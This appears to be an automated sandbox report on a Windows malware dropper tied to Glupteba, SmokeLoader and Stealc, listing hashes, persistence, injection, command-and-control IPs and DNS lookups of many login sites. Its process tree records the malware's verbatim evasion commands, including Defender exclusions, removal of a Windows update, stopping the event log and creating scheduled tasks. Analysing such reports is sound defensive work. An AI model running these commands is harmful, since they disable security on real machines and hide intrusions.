SHA256 d277eb3123c21467dfa5b85e41bf1c6b85d83f5aef8d2df9b991e7a9c0d8c064
SHA512 d2884dd10db65e9a6d621e7585e34402339a1feb61fbe95f7d039023f06f3bba8782a4da5a24d9ba9a02e40f46e346541fdf9d8c6778e2a1ce57ffcdd0b83aa2

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 93dfce7a88a4d13aefbaa828985ce399
SHA1 8ac5ba14bd07a39b3dfff07d11d68a4cced7fdd8
SHA256 f401abede674e9808706cf5c6887d647e736a6a7f17a6a19033ef7bfb1235b31
SHA512 5fc73ce4fb9b6818952f5efb85426e8b966b12d1d7b90fae01114d3d471b3b7fe5cebbbc1bcc13a6a261c1d24c2da893b4859862f0efddc330e0276e4ae7c4b8

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 04:48

Reported

2024-02-23 04:53

Platform

win7-20240221-en

Max time kernel

46s

Max time network

306s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Creates new service(s)

persistence

Downloads MZ/PE file

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\A083.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\C094.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2672 set thread context of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2672 N/A N/A C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 2672 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\A083.exe C:\Users\Admin\AppData\Local\Temp\A083.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 2568 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 2432 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 2928 N/A N/A C:\Users\Admin\AppData\Local\Temp\BA1D.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1656 N/A N/A C:\Users\Admin\AppData\Local\Temp\C094.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1208 wrote to memory of 1520 N/A N/A C:\Users\Admin\AppData\Local\Temp\E100.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1520 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\E100.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1208 wrote to memory of 2008 N/A N/A C:\Users\Admin\AppData\Local\Temp\ECF3.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
PID 1944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe

"C:\Users\Admin\AppData\Local\Temp\5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d.exe"

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Users\Admin\AppData\Local\Temp\A083.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A4D8.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\A4D8.dll

C:\Users\Admin\AppData\Local\Temp\BA1D.exe

C:\Users\Admin\AppData\Local\Temp\BA1D.exe

C:\Users\Admin\AppData\Local\Temp\C094.exe

C:\Users\Admin\AppData\Local\Temp\C094.exe

C:\Users\Admin\AppData\Local\Temp\E100.exe

C:\Users\Admin\AppData\Local\Temp\E100.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\ECF3.exe

C:\Users\Admin\AppData\Local\Temp\ECF3.exe

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\600.exe

C:\Users\Admin\AppData\Local\Temp\600.exe

C:\Users\Admin\AppData\Local\Temp\is-U9REL.tmp\600.tmp

"C:\Users\Admin\AppData\Local\Temp\is-U9REL.tmp\600.tmp" /SL5="$201DC,4470470,54272,C:\Users\Admin\AppData\Local\Temp\600.exe"

C:\Users\Admin\AppData\Local\Temp\1961.exe

C:\Users\Admin\AppData\Local\Temp\1961.exe

C:\Users\Admin\AppData\Local\Temp\nso191E.tmp

C:\Users\Admin\AppData\Local\Temp\nso191E.tmp

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\26EA.exe

C:\Users\Admin\AppData\Local\Temp\26EA.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\is-9JUEJ.tmp\1961.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9JUEJ.tmp\1961.tmp" /SL5="$40204,4314505,54272,C:\Users\Admin\AppData\Local\Temp\1961.exe"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\taskeng.exe

taskeng.exe {A931430C-753A-455E-B231-CD59EB70E8D1} S-1-5-21-1650401615-1019878084-3673944445-1000:UADPPTXT\Admin:Interactive:[1]

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240223045010.log C:\Windows\Logs\CBS\CbsPersist_20240223045010.cab

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

"C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Roaming\getvuvu

C:\Users\Admin\AppData\Roaming\getvuvu

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

Network

Country Destination Domain Proto
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 62.216.85.110:34049 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 184.105.221.249:443 tcp
DE 93.186.202.32:9001 tcp
US 128.31.0.39:9101 tcp
US 162.247.74.201:443 tcp
US 8.8.8.8:53 trmpc.com udp
MX 187.211.34.223:80 trmpc.com tcp
N/A 127.0.0.1:49270 tcp
FI 194.34.134.13:9007 tcp
LV 94.140.120.130:443 tcp
US 8.8.8.8:53 en.bestsup.su udp
US 104.21.29.103:80 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
FI 194.34.134.13:9007 tcp
LV 94.140.120.130:443 tcp
AT 5.42.64.33:80 5.42.64.33 tcp
US 8.8.8.8:53 z-shadow.info udp
US 8.8.8.8:53 zmodeler3.com udp
US 8.8.8.8:53 z-shadow.info udp
US 8.8.8.8:53 pornhubpremium.com udp
US 8.8.8.8:53 aminoapps.com udp
US 8.8.8.8:53 zmodeler3.com udp
US 8.8.8.8:53 zmodeler3.com udp
US 8.8.8.8:53 pornhubpremium.com udp
US 8.8.8.8:53 pornhubpremium.com udp
US 8.8.8.8:53 aminoapps.com udp
US 8.8.8.8:53 mx156.hostedmxserver.com udp
US 8.8.8.8:53 bitmax.io udp
US 8.8.8.8:53 bitmax.io udp
US 8.8.8.8:53 unite.nike.com udp
US 8.8.8.8:53 www30.mercantilbanco.com udp
US 8.8.8.8:53 mobile.twitter.com udp
US 8.8.8.8:53 unite.nike.com udp
US 8.8.8.8:53 lpse.blitarkab.go.id udp
US 8.8.8.8:53 unite.nike.com udp
US 8.8.8.8:53 aspmx.l.google.com udp
US 8.8.8.8:53 www30.mercantilbanco.com udp
US 8.8.8.8:53 mxa-002a0701.gslb.pphosted.com udp
US 8.8.8.8:53 www30.mercantilbanco.com udp
US 8.8.8.8:53 mobile.twitter.com udp
US 8.8.8.8:53 mxa-002a0701.gslb.pphosted.com udp
US 8.8.8.8:53 lpse.blitarkab.go.id udp
US 8.8.8.8:53 registrazione.comune.milano.it udp
US 8.8.8.8:53 registrazione.comune.milano.it udp
US 8.8.8.8:53 id.g2a.com udp
US 8.8.8.8:53 dapesa.biz udp
US 8.8.8.8:53 id.g2a.com udp
US 8.8.8.8:53 dapesa.biz udp
US 8.8.8.8:53 app-vlc.hotmart.com udp
US 8.8.8.8:53 pt.chaturbate.com udp
US 8.8.8.8:53 app-vlc.hotmart.com udp
US 8.8.8.8:53 m.anibis.ch udp
US 8.8.8.8:53 aakash.ac.in udp
US 8.8.8.8:53 pt.chaturbate.com udp
US 8.8.8.8:53 users.nexusmods.com udp
US 8.8.8.8:53 m.anibis.ch udp
US 8.8.8.8:53 inbound-smtp.us-east-1.amazonaws.com udp
US 8.8.8.8:53 mailhandler.g2a.com udp
US 8.8.8.8:53 mailhandler.g2a.com udp
US 8.8.8.8:53 m.anibis.ch udp
US 8.8.8.8:53 aakash.ac.in udp
US 8.8.8.8:53 bitexen.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 auth.riotgames.com udp
US 8.8.8.8:53 users.nexusmods.com udp
US 8.8.8.8:53 bitexen.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 users.nexusmods.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 auth.riotgames.com udp
US 8.8.8.8:53 gamerarena.com udp
US 8.8.8.8:53 ntamoney.pw udp
US 8.8.8.8:53 parent.neverskip.com udp
US 8.8.8.8:53 ntamoney.pw udp
US 8.8.8.8:53 parent.neverskip.com udp
US 8.8.8.8:53 bitexen-com.mail.protection.outlook.com udp
US 8.8.8.8:53 mx.yandex.net udp
US 8.8.8.8:53 prt.windscribe.com udp
US 8.8.8.8:53 mx.yandex.net udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 vivekbindraslc.com udp
US 8.8.8.8:53 prt.windscribe.com udp
US 8.8.8.8:53 prt.windscribe.com udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 pokersoda.info udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 vivekbindraslc.com udp
US 8.8.8.8:53 patria.org.ve udp
US 8.8.8.8:53 selfcare.safaricom.co.ke udp
US 8.8.8.8:53 vivekbindraslc.com udp
US 8.8.8.8:53 pscwb.ucanapply.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 pscwb.ucanapply.com udp
US 8.8.8.8:53 pscwb.ucanapply.com udp
US 8.8.8.8:53 xn--12cf3e2aboqw2gm3je2n.com udp
US 8.8.8.8:53 patria.org.ve udp
US 8.8.8.8:53 patria.org.ve udp
US 8.8.8.8:53 xn--12cf3e2aboqw2gm3je2n.com udp
US 8.8.8.8:53 seller.shopee.co.id udp
US 8.8.8.8:53 business.facebook.com udp
US 8.8.8.8:53 business.facebook.com udp
US 8.8.8.8:53 seller.shopee.co.id udp
US 8.8.8.8:53 correo.patria.org.ve udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 freemining.co udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 sainsburys.taleo.net udp
US 8.8.8.8:53 sistemaup.app udp
US 8.8.8.8:53 secure.moneygram.com udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 freemining.co udp
US 8.8.8.8:53 smtpin.vvv.facebook.com udp
US 8.8.8.8:53 sainsburys.taleo.net udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 ssl.zc.qq.com udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 store.serif.com udp
US 8.8.8.8:53 forum.gsmdevelopers.com udp
US 8.8.8.8:53 sistemaup.app udp
US 8.8.8.8:53 store.serif.com udp
US 8.8.8.8:53 sistemaup.app udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 mx2.privateemail.com udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 mx2.privateemail.com udp
US 8.8.8.8:53 forum.gsmdevelopers.com udp
US 8.8.8.8:53 bitsforclicks.com udp
US 8.8.8.8:53 transcash.espace-personnel.fr udp
US 8.8.8.8:53 login.ezp.tccd.edu udp
US 8.8.8.8:53 park-mx.above.com udp
US 8.8.8.8:53 transcash.espace-personnel.fr udp
US 8.8.8.8:53 login.ezp.tccd.edu udp
US 8.8.8.8:53 launcherfenix.com.ar udp
US 8.8.8.8:53 netbanking.kotak.com udp
US 8.8.8.8:53 netbanking.kotak.com udp
US 172.67.74.133:21 transcash.espace-personnel.fr tcp
GB 18.154.84.5:465 store.serif.com tcp
SG 103.204.130.192:143 forum.gsmdevelopers.com tcp
US 147.182.130.78:995 mx156.hostedmxserver.com tcp
US 172.67.74.133:443 transcash.espace-personnel.fr tcp
US 104.18.10.111:22 netbanking.kotak.com tcp
US 8.8.8.8:53 tezerac.com udp
US 8.8.8.8:53 cdn.testout.com udp
US 8.8.8.8:53 tezerac.com udp
US 8.8.8.8:53 tezerac.com udp
US 8.8.8.8:53 launcherfenix.com.ar udp
US 8.8.8.8:53 launcherfenix.com.ar udp
US 8.8.8.8:53 cdn.testout.com udp
GB 18.154.84.31:465 store.serif.com tcp
US 104.18.11.111:22 netbanking.kotak.com tcp
US 104.26.0.108:21 transcash.espace-personnel.fr tcp
GB 18.154.84.5:995 store.serif.com tcp
GB 18.154.84.21:465 store.serif.com tcp
SG 103.204.130.192:465 forum.gsmdevelopers.com tcp
GB 18.154.84.5:80 store.serif.com tcp
NL 164.90.197.79:995 mx156.hostedmxserver.com tcp
US 152.199.21.175:22 cdn.testout.com tcp
US 64.28.242.31:143 login.ezp.tccd.edu tcp
US 50.3.150.96:22 tezerac.com tcp
US 172.67.153.84:21 launcherfenix.com.ar tcp
US 104.21.72.175:443 launcherfenix.com.ar tcp
GB 18.154.84.31:995 store.serif.com tcp
US 172.67.74.133:143 transcash.espace-personnel.fr tcp
US 50.3.150.96:443 tezerac.com tcp
US 8.8.8.8:53 m.comixology.com udp
US 104.26.0.108:143 transcash.espace-personnel.fr tcp
US 8.8.8.8:53 tribalwars.com.pt udp
SG 103.204.130.192:80 forum.gsmdevelopers.com tcp
US 104.18.10.111:443 netbanking.kotak.com tcp
US 8.8.8.8:53 ftp.xn--12cf3e2aboqw2gm3je2n.com udp
US 8.8.8.8:53 ftp.vivekbindraslc.com udp
US 8.8.8.8:53 mail.m.anibis.ch udp
US 8.8.8.8:53 m.comixology.com udp
US 64.28.242.31:80 login.ezp.tccd.edu tcp
US 8.8.8.8:53 my.sp.com.sa udp
US 8.8.8.8:53 ftp.ntamoney.pw udp
US 8.8.8.8:53 sammobile.com udp
US 8.8.8.8:53 onlineftp.ch udp
